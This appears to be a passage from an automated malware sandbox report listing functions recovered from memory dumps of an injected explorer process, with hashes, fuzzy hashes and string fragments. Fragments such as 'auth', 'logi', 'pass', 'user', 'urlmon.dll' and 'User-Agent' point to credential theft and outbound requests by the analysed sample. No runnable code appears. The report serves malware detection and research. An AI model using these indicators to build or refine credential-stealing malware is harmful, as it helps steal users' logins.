                                            • API String ID: 0-327345718
                                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction ID: 948c624fa16560832b92511cea6d84b2f267a0b32a1727764cb7ab41da5846ec
                                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction Fuzzy Hash: C5418670A18E0D8FCB98EF58C095BAD73E2FF58300F51456AE80ED7260EA31E9448BC5
                                            Function 10ABE4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 32.d$cli.$dll$sspi$user
                                            • API String ID: 0-327345718
                                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction ID: c946167a764a6de3eea90e76164e8109d042acb4385a8e944030697e62ef3367
                                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction Fuzzy Hash: A3418F30A18E1D8FCB94EF68C1A57AD77E5FB68304F41466AA90ED7200EE30D940CBC6
                                            Function 10C084B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 32.d$cli.$dll$sspi$user
                                            • API String ID: 0-327345718
                                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction ID: b14daac34de3790cd0fb8eca073499ded144b3357c31e931e12a141fc80f07ef
                                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction Fuzzy Hash: 0941AF35A18E0D8FDB84EF68C4953AE37E1FB68300F40816AA84ED7214DE30D945CF86
                                            Function 10353432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$el32$h$kern
                                            • API String ID: 0-4264704552
                                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction ID: 4220a01e4c3b52e40f1468411862ef35f4bafa940b7efdf95c97f99f27bcda1f
                                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction Fuzzy Hash: 62419270608B498FD7A9DF2980947AAF7E1FB98300F114B2E949EC7265DB70D949CB41
                                            Function 10ABC432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$el32$h$kern
                                            • API String ID: 0-4264704552
                                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction ID: dfcbc9e873ef201b61dda0399aa3726eefd7fb14dfa7e876f51c8ec89aff1cb5
                                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction Fuzzy Hash: 3F416F70608B4D8FD7A9DF2884857AABBE5FB98340F104B2FD49AC2255DB70E945CB81
                                            Function 10C06432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$el32$h$kern
                                            • API String ID: 0-4264704552
                                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction ID: a4af9368d6ef7b23e08b68c32a5d03e33f329eb0ace547729cfca6a4b66098cf
                                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction Fuzzy Hash: 20418274608B498FD799DF6884843AAB7E1FB98300F204A6E949EC7259DF70D945CF41
                                            Function 1035A0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction ID: 58872e719fb461b616207945e8b6033cbd23a03b5bee2aca66179cc34182c97c
                                            • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction Fuzzy Hash: CD31E67550CB885FD75ADB28C485ADAB7D4FB84300F50491EE49BCB2A2EE30A54ACB43
                                            Function 10AC30B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction ID: 97b791b9a92b2f19222d901574221605efae3ead3e6ebc22dbd084f8ec39d1ed
                                            • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction Fuzzy Hash: BB31CF7550CB886FD71ADB28C5857EAB7D0FB94300F50491EE49BC7252EE30A64ACB42
                                            Function 10C0D0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: f878d84711fec8a867dd74ccabbac59fdf72b54213b0415dc7da620d78be14e8
                                            • Instruction ID: f63f4dc43ffb642b1d15773dd590cebc249032141b970b7b2240940d8aff5616
                                            • Opcode Fuzzy Hash: f878d84711fec8a867dd74ccabbac59fdf72b54213b0415dc7da620d78be14e8
                                            • Instruction Fuzzy Hash: C431F07550CB88AFD71ADB28C0856EAB7D0FB94300F50491EE49BCB252EE30A54ACF43
                                            Function 1035A0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction ID: 820233154b8a12c9bcb8f355742674056089276586304aded18cb5108af2942a
                                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction Fuzzy Hash: 2431D275508F486FD759DB28C485AEAB7E4FB94300F50491EE49BC72A2EE30E54ACB43
                                            Function 10AC30C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction ID: 8384a251113718f2030e2bab01dc4fbf54082cc08319c84aeee20e887df279dc
                                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction Fuzzy Hash: 8C31C175508B486FD75ADB28C585BEAB7D4FB94300F50491EE49BC7251EE30F60ACA42
                                            Function 10C0D0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: eb65a4bc72e2e2faced016151a06cd003fc52d5f0671ca348bf5022ca6b12604
                                            • Instruction ID: 59d779fa2159d8751b95833c1354ce9d9f5870d84269d37b2d10f00509f5f2f6
                                            • Opcode Fuzzy Hash: eb65a4bc72e2e2faced016151a06cd003fc52d5f0671ca348bf5022ca6b12604
                                            • Instruction Fuzzy Hash: 6C310375508B48AFD31ADB28C485AEEB7D1FB94300F40491EE49BC7246EE30E54ACE43
                                            Function 10355FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction ID: 883468a7fc19370ea0aea8a0289a4ef9bf6ecdfe485aa3950711716378e9d662
                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction Fuzzy Hash: 3D317E74218B484FC784EF689495FAAB7E1FBD8300F85467DA84ACB264DF30D949C752
                                            Function 10ABEFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction ID: f6d7447bf406165bf126b7f12685476f9b28496914e5ce5cddf606a5be4beab6
                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction Fuzzy Hash: 76317C74118B484FCB84EF688696BAAB7E5FF98300F85462DA44ECB215DF30E945C792
                                            Function 10C08FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction ID: 4eb70289bc4454047622506d90fea4a9ef779b7b12dda56dd2db0ad438deaf20
                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction Fuzzy Hash: 8131A478118B588FC784EF6884957AA77E1FF98300F90466DA84ECB258DF30D945CB82
                                            Function 10355FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction ID: 7bc2cda5932b8f61afff178c7dde71da3e03b9cc561c69f369657a9e3bd6a6d9
                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction Fuzzy Hash: 6D318B74218B088FC784DF689495BAAB7E1FFD8300F85463DA84ACB264DF30D909CB52
                                            Function 10ABEFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction ID: f2a049d2f02c94af5173eb87aea8b99ba11618d1c76a543d7d5b21134341372b
                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction Fuzzy Hash: 1F319E74118B484FCB84EF688695BAAB7E5FFD8300F85463DA44ACB255DF30D905C752
                                            Function 10C08FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction ID: 4a0976442636ada26c79db850f997bea10b4a86e4b80ec6b36c9d94c34d1a8d3
                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction Fuzzy Hash: FD31B278218B188FC784DF6884957AA77E1FF98300F90466DA84ECB258CF30D945CB82
                                            Function 103588C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 0-319646191
                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction ID: 62bddf8aa215b6d7e719f05cd02ef1493afe1b032402467fef8f82e1fb3e7882
                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction Fuzzy Hash: 5131E331614A4C8FCB44EFA8C885BEDB7E0FF58205F40422AE44EDB250DF749649C799
                                            Function 10AC18C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 0-319646191
                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction ID: 9b21e0aa5eabc78fd228936c857b43fd6e44911fb3d4fc5f46a9dd3a3267636b
                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction Fuzzy Hash: FD31D131614A0C8BCB45EFA8C9857EDBBE0FF58214F41422AE44ED7240DF749649C789
                                            Function 10C0B8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 0-319646191
                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction ID: fd45503ebbd8e2e52b3511a75b9d8574b8193336ae47b9ea4b4f702becbda0a1
                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction Fuzzy Hash: 2331E375614A0C8FCB45EFA8C8857EDB7E1FF68204F40022AE45EDB240DF789645CB89
                                            Function 103588BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 0-319646191
                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction ID: 306f48596dae3ba074102003ba7072e55d547498ad0af23e847d115de0ba2631
                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction Fuzzy Hash: D421F830614A4C8FCB04EFA8C845BEDBBF4FF58204F40421AE45ADB250DF749609C795
                                            Function 10AC18BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 0-319646191
                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction ID: ea69bda96f277f225ec431a7a897444fa47dea174bc1155519f137a20ca429a4
                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction Fuzzy Hash: D021D230614A4C8BCB05EFA8CA957EDBBF0FF59214F42422AE45BD7240DF74A605CB89
                                            Function 10C0B8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 0-319646191
                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction ID: 63529279c70c0e971f20422bc5de9ed7eb1da2ae411c1dfc525971b58bc53cd3
                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction Fuzzy Hash: 4521D275610A4C8FCB05EFA8C8957EDBBF1FF58244F40422AE45ADB240DF749645CB89
                                            Function 10359E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$l$l$t
                                            • API String ID: 0-168566397
                                            • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                            • Instruction ID: fd034f551e332d51589116d02efa68b0e609462d9a27f1137db02a4c10c9ed8e
                                            • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                            • Instruction Fuzzy Hash: 6D216B74A24A0D9FDB48EFA8D045BEEBBF1FB58304F50462EE009D7610DB78A5558B84
                                            Function 10359E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$l$l$t
                                            • API String ID: 0-168566397
                                            • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                            • Instruction ID: d942fbb0348195812f627e6a3d178d51f718208632184a2686aa81cae9594aad
                                            • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                            • Instruction Fuzzy Hash: DB215C74A24A0D9FDB48EFA8D045BAEBBF1FB58304F50462EE009D7610DB74A5558B84
                                            Function 10AC2E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$l$l$t
                                            • API String ID: 0-168566397
                                            • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                            • Instruction ID: 6a455619b01aa36119751416ed7d0e86188f7e50e8ba4b73a21b15b9c4d9c614
                                            • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                            • Instruction Fuzzy Hash: D0218B74A24A0D9FDB08EFA8C1457EDBBF0FF18310F51462EE009E3600DB78A5918B84
                                            Function 10AC2E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$l$l$t
                                            • API String ID: 0-168566397
                                            • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                            • Instruction ID: 0c6bec6b4f5624d0342f9a92829a260b033c6d1f59060284cd68f0e3872dd421
                                            • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                            • Instruction Fuzzy Hash: 22218D74A24A0D9FDB44EFA8C1447ADBAF0FF58310F51462EE009D3600DB74A591CB84
                                            Function 10C0CE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$l$l$t
                                            • API String ID: 0-168566397
                                            • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                            • Instruction ID: 5692006ca3b27a0785e212abad00e477cdf73a3b16d91b2e5d8b1c1a04956cbe
                                            • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                            • Instruction Fuzzy Hash: D1217CB8A24A0DDFDB44EFA8D0457ADBAF1FF58300F50462EE009E7610DB74A591CB84
                                            Function 10C0CE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$l$l$t
                                            • API String ID: 0-168566397
                                            • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                            • Instruction ID: e6fea0e2cabf0029862d510af51745205178140adb1a523de1a9613c88dd6cb2
                                            • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                            • Instruction Fuzzy Hash: 66217CB8A24A0D9BDB04EFA8D4457EDBBF1FB18300F50462EE009E7600DB74A591CB84
                                            Function 10359FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: auth$logi$pass$user
                                            • API String ID: 0-2393853802
                                            • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                            • Instruction ID: b790f16be167a1e0976867d3780bca1a40acbecda7b2aecfdfd751ae7589555e
                                            • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                            • Instruction Fuzzy Hash: 2721D270624B0D8BCB45CF9D9881BDEB7F1EF88344F014619E40ADB294D7B0E9198BC2
                                            Function 10AC2FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
